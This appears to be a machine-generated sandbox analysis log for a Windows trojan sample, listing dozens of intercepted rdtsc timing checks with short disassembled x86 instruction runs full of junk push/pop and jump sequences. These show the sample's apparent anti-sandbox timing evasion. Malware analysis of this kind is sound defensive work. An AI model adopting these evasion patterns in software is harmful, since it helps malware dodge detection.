Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0D59 second address: DC0D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC07CF second address: DC07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0922 second address: DC092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC2477 second address: DC247D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6ED6 second address: DC6EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F362081F5A1h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F362081F596h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6EF7 second address: DC6F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9102h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC6F13 second address: DC6F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFEBF second address: DCFEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD62 second address: DCFD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD68 second address: DCFD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DCFD6C second address: DCFD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F362081F5A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD3D05 second address: DD3D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA544 second address: DDA580 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F362081F59Ah 0x00000008 pushad 0x00000009 jmp 00007F362081F59Dh 0x0000000e jmp 00007F362081F5A9h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA580 second address: DDA58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3620DC90F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA58A second address: DDA5A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F362081F59Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA5A6 second address: DDA5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E3C second address: DD8E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E40 second address: DD8E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E4C second address: DD8E5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 ja 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E5C second address: DD8E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8E62 second address: DD8ED2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F362081F5A5h 0x0000000f jnl 00007F362081F5BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F362081F59Ah 0x0000001c jmp 00007F362081F5A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD8ED2 second address: DD8ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD916D second address: DD9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD9173 second address: DD917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DD942E second address: DD944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F362081F5A2h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA258 second address: DDA274 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3620DC9106h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA274 second address: DDA279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDA279 second address: DDA296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9103h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDD228 second address: DDD22D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCDC1 second address: DDCDCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCF76 second address: DDCF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DDCF7B second address: DDCF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3620DC90F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DEE6E9 second address: DEE71A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F362081F5A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F362081F59Ah 0x00000011 push esi 0x00000012 jl 00007F362081F596h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE8B26 second address: CE8B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE8B2A second address: CE8B55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A7h 0x00000007 jo 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F362081F59Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF3805 second address: DF380B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF380B second address: DF3821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F362081F5A1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DF3821 second address: DF3863 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3620DC910Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f jmp 00007F3620DC9105h 0x00000014 jns 00007F3620DC90FEh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DEAB34 second address: DEAB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D48 second address: E19D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3620DC90F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D5A second address: E19D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D5E second address: E19D82 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC90FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC90FCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D82 second address: E19D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Fh 0x00000007 jnl 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E19D9F second address: E19DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E18AEC second address: E18B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jc 00007F362081F596h 0x0000000c jmp 00007F362081F5A8h 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F362081F5A8h 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E18B2F second address: E18B52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 jng 00007F3620DC90F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3620DC90FFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E193D7 second address: E193FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F362081F5BAh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F362081F5A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E195A0 second address: E195E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9108h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F3620DC9104h 0x00000011 jmp 00007F3620DC90FAh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E1FA5D second address: E1FAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F362081F596h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 add edx, dword ptr [ebp+122D5AEBh] 0x0000001b push dword ptr [ebp+122D1EA5h] 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F362081F598h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b js 00007F362081F59Ch 0x00000041 mov dword ptr [ebp+122D2936h], ebx 0x00000047 push 2B1FEB3Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e jl 00007F362081F598h 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E21372 second address: E213CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F3620DC90FAh 0x00000017 jmp 00007F3620DC9106h 0x0000001c popad 0x0000001d jmp 00007F3620DC9108h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E213CA second address: E213CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: E213CE second address: E213D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FC0138 second address: 4FC0142 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EB5 second address: 4FE0EE2 instructions: 0x00000000 rdtsc 0x00000002 mov si, B5ADh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F3620DC90FAh 0x0000000d jmp 00007F3620DC9102h 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EE2 second address: 4FE0EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EE6 second address: 4FE0EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0EEC second address: 4FE0F54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F362081F59Eh 0x00000011 jmp 00007F362081F5A5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F362081F5A0h 0x0000001d xor cl, 00000068h 0x00000020 jmp 00007F362081F59Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FE0F54 second address: 4FE0F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80170 second address: 4F80174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80174 second address: 4F8017A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F8017A second address: 4F801AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 46h 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F362081F59Ah 0x00000012 and esi, 66F80098h 0x00000018 jmp 00007F362081F59Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov eax, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801AD second address: 4F801B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801B2 second address: 4F801B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801B8 second address: 4F801BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F801BC second address: 4F80209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 pushfd 0x00000015 jmp 00007F362081F5A6h 0x0000001a or esi, 37177488h 0x00000020 jmp 00007F362081F59Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4F80209 second address: 4F80231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ah, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3620DC9109h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0DC2 second address: 4FA0DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0DC6 second address: 4FA0DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0DCC second address: 4FA0E44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov esi, 3EADDBEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F362081F5A0h 0x00000014 mov bl, cl 0x00000016 pop edi 0x00000017 pushfd 0x00000018 jmp 00007F362081F59Ch 0x0000001d xor ecx, 20834948h 0x00000023 jmp 00007F362081F59Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F362081F5A9h 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 call 00007F362081F5A3h 0x00000039 pop eax 0x0000003a mov ax, bx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0933 second address: 4FA0939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0939 second address: 4FA093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA093F second address: 4FA0943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0943 second address: 4FA0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, EDA1h 0x0000000f jmp 00007F362081F59Eh 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop esi 0x0000001b call 00007F362081F5A9h 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0982 second address: 4FA0993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC90FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: 4FA0590 second address: 4FA0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
